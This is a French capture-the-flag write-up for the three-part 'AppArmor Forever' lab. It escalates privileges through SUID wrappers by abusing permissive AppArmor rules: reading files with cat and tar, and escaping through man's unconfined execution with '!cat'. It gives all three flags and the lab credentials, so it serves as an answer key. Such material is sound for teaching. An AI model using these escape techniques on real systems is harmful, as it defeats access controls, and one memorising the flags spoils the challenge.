# WRITEUP AppArmor Forever

## Catégorie :

`Wargame`

## Consigne :

```
Le challenge **AppArmor Forever** est en 3 parties (3 flags à valider).

Démarrer un environnement virtuel. **Attention** :
 - Garder votre environnement démarré pour ces 3 parties
 - La durée de vie de l'environnement est limitée


Pour se connecter :

- `ssh user1@<ip_portailvms>`
- `Password: LMQRDFG`

<div>
<button class="btn btn-info" onclick="window.open('/portailvms/27','_blank')" >Accéder au portail</button>
</div>
<p></p>
```

## Pièce(s) jointe(s) :

```
Néant
```

## Serveur :

```
PortailVMS
```

## Difficulté :

```
- part 1 : easy
- part 2 : easy
- part 3 : easy
```

## Hint : 

```
Néant
```

## Flag :

```
- part 1 : `fl@g{BravoVo1c1LeDrapeau1}`
- part 2 : `fl@g{4pp4rmorFlterMangez-En}`
- part 3 : `fl@g{app4rmorRules4reN0tCompl1cated}`
```

## Solution : 

### Partie 1

On se connecte en ssh (remplacer l'adresse IP par celle allouée par le PortailVMS) :

```bash
ssh user1@172.24.70.100
```

Quels droits avons-nous ?

```bash
user1@debian:~$ sudo -l
Entrées Defaults correspondant pour user1 sur debian :
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

L'utilisateur user1 peut utiliser les commandes suivantes sur debian :
    (root) NOPASSWD: /usr/sbin/aa-status
```

On peut executer la commande *aa-status* qui est un outil lié à **AppArmor**, ce qui semble cohérent avec le titre du challenge.

```bash
user1@debian:~$ sudo aa-status 
apparmor module is loaded.
22 profiles are loaded.
20 profiles are in enforce mode.
   /opt/apparmor_forever/wrapper_level1
   /opt/apparmor_forever/wrapper_level2
   /opt/apparmor_forever/wrapper_level3
    ....
```

On constate qu'il existe certains programmes confinés qui pourraient nous intéresser :

```bash
user1@debian:~$ ls -l /opt/apparmor_forever/
total 40
-rwsr-x--- 1 user2 user1 16304 19 déc.  21:35 wrapper_level1
-rw-r--r-- 1 root  root    374 19 déc.  21:35 wrapper_level1.c
-rwsr-x--- 1 user3 user2 16304 19 déc.  21:35 wrapper_level2
-rw-r--r-- 1 root  root    375 19 déc.  21:35 wrapper_level2.c
...
```

En tant qu'utilisateur *user1*, nous pouvons démarrer un programme qui s'exécutera en tant que *user2* (bit SUID positionné). On nous fourni le code source `wrapper_level1.c`. Son contenu nous informe qu'il tente d'exécuter le script `/home/user1/level1.sh`.

Je créé donc le script `/home/user1/level1.sh`, avec le contenu suivant 

```bash
#!/bin/sh

id
```

Et je l'execute via son *wrapper* :

```bash
user1@debian:~$ chmod 755 level1.sh
user1@debian:~$ /opt/apparmor_forever/wrapper_level1
/home/user1/level1.sh: 3: id: Permission denied
```

Je n'ai pas le droit de simplement exécuter la commande id ? Sûrement à cause d'AppArmor. Je regarde le contenu du fichier `/etc/apparmor.d/opt.apparmor_forever.wrapper_level1` (extrait) :

```bash
/opt/apparmor_forever/wrapper_level1 {
...
  /usr/bin/cat mrix,
...
  owner /home/*/ r,
  owner /home/user2/* r,
...
}
```
Nous constatons que nous sommes autorisés à utiliser la commande *cat*. De plus ces filtres *AppArmor* nous autorise à lire des fichiers dans le dossier */home/user2/*.

```bash
user1@debian:~$ ls -la ../user2/
total 48
drwxr-xr-x 3 user2 user2 4096 19 déc.  21:24 .
drwxr-xr-x 7 root  root  4096 20 déc.  07:48 ..
-rw------- 1 user2 user2 1118 20 déc.  08:25 .bash_history
-rw-r--r-- 1 user2 user2  220 19 déc.  19:58 .bash_logout
-rw-r--r-- 1 user2 user2 3526 19 déc.  19:58 .bashrc
...
-r-------- 1 user2 root   249 20 déc.  08:25 .secret1
```

Présence d'un fichier caché se nommant `.secret1`.

On modifie le script `/home/user1/level1.sh` :

```bash
#!/bin/sh
cat /home/user2/.secret1
```

Et j'exécute de nouveau son *wrapper* :

```bash
user1@debian:~$ /opt/apparmor_forever/wrapper_level1
Voici le premier flag. Pensez à le valider. 

fl@g{BravoVo1c1LeDrapeau1}

Maintenant passez à la partie 2 :

à partir de votre session ouverte en tant que user1 :

    su - user2

le mot de passe de user2 est tout simplement le flag ci-dessus.
```

### Partie 2

On se connecte en tant que *user2* comme indiqué précédemment (`su - user2`) :

Le principe est identique à la partie 1. Les fichiers associés sont maintenant :

 - /home/user3/.secret2 (le secret/flag)
 - /opt/apparmor_forever/wrapper_level2 (le programme SUID qui permet à *user2* d'exécuter du code en tant que *user3*)
 - /opt/apparmor_forever/wrapper_level2.c (le code source du programme SUID)
 - /etc/apparmor.d/opt.apparmor_forever.wrapper_level2 (le filtre AppArmor du programme `/opt/apparmor_forever/wrapper_level2`)

Si on inspecte le filtre AppArmor (fichier `/etc/apparmor.d/opt.apparmor_forever.wrapper_level2`), extrait :

```bash
/opt/apparmor_forever/wrapper_level2 {
...
  /home/user2/level2.sh mrix,
  /opt/apparmor_forever/wrapper_level2 mr,
  /usr/bin/env ix,
  /usr/bin/tar mrix,
...
  owner /home/user3/.secret2 r,
  owner /tmp/level2/* w,
...
}

```

On constate que je suis autorisé à exécuter le programme `tar`, de plus je peux lire le fichier */home/user3/.secret2* et je peux écrire dans le dossier */tmp/level2/*.

Je créé le script `/home/user2/level2.sh`, avec le contenu :

```bash
#!/bin/sh
tar -cf /tmp/level2/level2_flag.tar /home/user3/.secret2
```

Je modifie les droits, créé le dossier ad-hoc et exécute le *wrapper* :

```bash
user2@debian:~$ chmod 755 level2.sh 
user2@debian:~$ mkdir /tmp/level2
user2@debian:~$ chmod 777 /tmp/level2
user2@debian:~$ /opt/apparmor_forever/wrapper_level2
tar: Suppression de « / » au début des noms des membres
```

Nous avons enfin le flag :

```bash
user2@debian:~$ tar -xvf /tmp/level2/level2_flag.tar 
home/user3/.secret2
user2@debian:~$ cat home/user3/.secret2 
Voici le deuxième flag. Pensez à le valider. 

fl@g{4pp4rmorFlterMangez-En}


Maintenant passez à la partie 3 :

à partir de votre session ouverte en tant que user2 :

    su - user3

le mot de passe de user3 est tout simplement le flag ci-dessus.
```

### Partie 3

On se connecte en tant que *user3* comme indiqué précédemment (`su - user3`).

Je consulte le fichier de filtre AppArmor */etc/apparmor.d/opt.apparmor_forever.wrapper_level3*.

Ce qui saute aux yeux rapidement, c'est la présence d'un profil enfant lié à la commande *vim* :

```bash
  profile /usr/bin/vim.basic {
    include <abstractions/base>

    /etc/nsswitch.conf r,
    /etc/papersize r,
    /etc/passwd r,
    /etc/vim/* r,
    /home/user3/ r,
    /home/user3/* rw,
    /usr/bin/vim.basic mr,
    /usr/share/vim/** r,

  }
```

On se rend compte assez rapidement qu'il ne nous servira pas à grand chose, en effet aucune autorisation de lecture dans le dossier */home/user4*.


Il faut qu'on analyse la totalité des commandes autorisées. On remarque la présence de *flags* associées à chaque commande. Par exemple `ix`, `mr`, `mrix`, ...

D'après la documentation d'AppArmor :

```
    r : Read mode
    w : Write mode (mutually exclusive to a)
    a : Append mode (mutually exclusive to w)
    k : File locking mode
    x : Execute
        ux : Execute unconfined (preserve environment) – WARNING: should only be used in very special cases
        Ux : Execute unconfined (scrub the environment)
        px : Execute under a specific profile (preserve the environment) – WARNING: should only be used in special cases
        Px : Execute under a specific profile (scrub the environment)
        pix : as px but fallback to inheriting the current profile if the target profile is not found
        Pix : as Px but fallback to inheriting the current profile if the target profile is not found
        pux : discrete profile execute with fallback to unconfined
        PUx : discrete profile execute with fallback to unconfined -- scrub the environment
        ix : Execute and inherit the current profile
        cx : Execute and transition to a child profile (preserve the environment)
        Cx : Execute and transition to a child profile (scrub the environment)
        cix : as cx but fallback to inheriting the current profile if the target profile is not found
        Cix : as Cx but fallback to inheriting the current profile if the target profile is not found
        cux : as cx but fallback to executing unconfined if the target profile is not found
        Cux : as Cx but fallback to executing unconfined if the target profile is not found
    m : Allow PROT_EXEC with mmap(2) calls
    l : Link mode
```

Listons ces commandes et trions-les par type de "flags" :

```bash
user3@debian:~$ cat /etc/apparmor.d/opt.apparmor_forever.wrapper_level3 | grep -E "^\s*(\/usr){0,1}\/s{0,1}bin" | sed -r 's/^\s+(.+)\s+(.+)\,/\2 \1/' | sort -u
Cx /usr/bin/vim.basic
ix /usr/bin/dash
ix /usr/bin/env
mrix /usr/bin/basename
mrix /usr/bin/cat
mrix /usr/bin/chgrp
mrix /usr/bin/clear
...
mrix /usr/bin/xset
mrix /usr/bin/xz
mrix /usr/bin/yes
mrix /usr/bin/zcat
mr /usr/bin/vim.basic
ux /usr/bin/man
```

Nous avons donc 5 types différents :

 - `Cx` : Execute and transition to a child profile (scrub the environment)
 - `ix` : Execute and inherit the current profile
 - `mrix` : Execute and inherit the current profile, Allow PROT_EXEC with mmap(2) calls and allow read
 - `mr` : Allow PROT_EXEC with mmap(2) calls and allow read
 - `ux` : Execute unconfined (preserve environment)

Là, c'est beaucoup plus clair et évident que les flags `ux` pourraient nous intéresser (mode un-confiné). Dans le fichier de profil il est associé au programme *man*.

Je créé un script *level3.sh* avec le contenu suivant :

```bash
#!/bin/sh
man man
```
Je modifie les droits et exécute :

```bash
user3@debian:~$ chmod 755 level3.sh
user3@debian:~$ /opt/apparmor_forever/wrapper_level3

```

Il est possible d'exécuter des commandes à partir de l'utilitaire *man* :

```bash
!cat ../user4/.secret3
```

Comme l'utilitaire *man* s'exécute en mode non confiné, le contenu du fichier est affiché :

```
Voici le troisième flag. Pensez à le valider. 

fl@g{app4rmorRules4reN0tCompl1cated}

!done  (press RETURN)
```

